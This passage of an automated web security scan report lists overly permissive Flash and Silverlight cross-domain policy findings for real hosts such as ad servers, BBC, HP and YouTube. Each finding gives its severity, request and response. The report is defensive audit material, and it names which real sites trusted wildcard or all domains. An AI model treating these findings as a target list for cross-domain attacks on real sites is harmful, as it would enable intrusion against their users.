<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.28. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 10:46:01 GMT
Expires: Mon, 16 May 2011 10:46:01 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 9032
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.29. http://hc2.humanclick.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hc2.humanclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: hc2.humanclick.com

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://hc2.humanclick.com/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:da2"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 13:56:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.30. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=115
Expires: Sun, 15 May 2011 13:57:47 GMT
Date: Sun, 15 May 2011 13:55:52 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.31. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sat, 14 May 2011 16:59:52 GMT
Expires: Sun, 15 May 2011 16:59:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 73547
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.32. http://pubads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 15 May 2011 03:47:21 GMT
Expires: Mon, 16 May 2011 03:47:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 34202
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.33. http://tvgids.upc.nl/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tvgids.upc.nl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: tvgids.upc.nl

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:40 GMT
Server: Apache
Last-Modified: Wed, 28 Jul 2010 15:36:40 GMT
ETag: "47e004-d2-48c74624ab200"
Accept-Ranges: bytes
Content-Length: 210
Cache-Control: max-age=5
Expires: Sun, 15 May 2011 15:40:45 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rtl.nl" />
</cross-domai
...[SNIP]...

4.34. http://w.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 06 May 2011 17:23:38 GMT
ETag: "32e87-14a-4a29ec0155a80"
Content-Type: application/xml
Date: Sun, 15 May 2011 13:59:51 GMT
Content-Length: 330
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.35. http://www.hp.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:14 GMT
Server: Apache
Last-Modified: Mon, 17 May 2010 11:29:38 GMT
ETag: "8a41ec80"
Accept-Ranges: bytes
Content-Length: 213
Cache-Control: max-age=7200
Expires: Sun, 15 May 2011 15:16:14 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.hp.com" />
</cross-dom
...[SNIP]...

4.36. http://www.upc.nl/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.upc.nl
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.upc.nl

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:33 GMT
Server: Apache
Last-Modified: Thu, 13 Jan 2011 11:26:11 GMT
ETag: "3e350a-1b1-499b895acbac0"
Accept-Ranges: bytes
Content-Length: 433
Cache-Control: max-age=5
Expires: Sun, 15 May 2011 15:40:38 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="ccc.upc.nl" />
<allow-access-from domain="*.chello.com" />
<allow-access-from domain="*.upc.com" />
<allow-access-from domain="*.upc.pl" />
...[SNIP]...

4.37. http://www.youtube.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 14:06:56 GMT
Server: Apache
Last-Modified: Fri, 13 May 2011 03:51:08 GMT
ETag: "132-4a320373f0300"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.38. http://t.tmimgcdn.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.tmimgcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.tmimgcdn.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Sun, 15 May 2011 13:56:59 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT
ETag: "3d88165-105-4886fcb83c300"
Accept-Ranges: bytes
Content-Length: 261
Expires: Wed, 09 May 2012 13:56:59 GMT
Cache-Control: max-age=31104000
X-Cache: MISS

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="images.templatemonster.com" headers="*" secure="true" />
...[SNIP]...

4.39. http://www.templatemonster.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.templatemonster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.templatemonster.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 15 May 2011 13:59:36 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 07 Jun 2010 12:27:24 GMT
ETag: "3d88165-105-4886fcb83c300"
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="images.templatemonster.com" headers="*" secure="true" />
...[SNIP]...

5. Silverlight cross-domain policy
There are 7 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Sun, 15 May 2011 13:16:52 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://c.gelifesciences.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.gelifesciences.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: c.gelifesciences.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:18:55 GMT
Server: Omniture DC/2.0.0
xserver: www74
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.3. http://iinet.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://iinet.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: iinet.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:32 GMT
Server: Omniture DC/2.0.0
xserver: www323
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://j2global.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://j2global.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: j2global.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:16:31 GMT
Server: Omniture DC/2.0.0
xserver: www9
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://met1.hp.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://met1.hp.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: met1.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:17:02 GMT
Server: Omniture DC/2.0.0
xserver: www81
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://upc.d2.sc.omtrdc.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://upc.d2.sc.omtrdc.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: upc.d2.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:40:45 GMT
Server: Omniture DC/2.0.0
xserver: www9
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://d.ligatus.com/clientaccesspolicy.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://d.ligatus.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: d.ligatus.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"1167-1291379570000"
Last-Modified: Fri, 03 Dec 2010 12:32:50 GMT
Content-Type: application/xml
Content-Length: 1167
Date: Sun, 15 May 2011 15:40:41 GMT
Connection: close
Server: Apache

